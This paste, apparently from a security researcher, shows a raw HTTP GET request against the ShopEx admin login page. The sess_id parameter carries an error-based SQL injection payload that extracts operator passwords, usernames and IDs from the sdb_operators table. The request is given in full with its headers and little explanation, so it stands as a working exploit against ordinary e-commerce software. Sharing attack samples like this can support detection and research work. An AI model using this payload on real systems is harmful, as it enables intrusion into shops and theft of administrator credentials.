ShopEx SQL Injection attack shopadmin sdb_operators

1. ShopEx SQL Injection attack
2. *******
3. *******
4. *******
5. GET/shopadmin/INDEX.php?ctl=passport&act=login&sess_id=1' and(select 1 from(select count(*),concat((select (select (select concat(userpass,0x7e,username,0x7e,op_id) from sdb_operators Order by username limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1   HTTP/1.1
6. Connection: Keep-Alive
7. Content-TYPE: application/x-www-form-urlencoded; Charset=UTF-8
8. Accept: */*
9. Accept-Language: zh-cn
10. User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
11. Host: www.mysite.com
12. *******
13. *******
14. *******
15. More FROM @neonprimetime security
16.  
17. http://pastebin.com/u/Neonprimetime
18. https://www.virustotal.com/en/USER/neonprimetime/
19. https://twitter.com/neonprimetime
20. https://www.reddit.com/USER/neonprimetime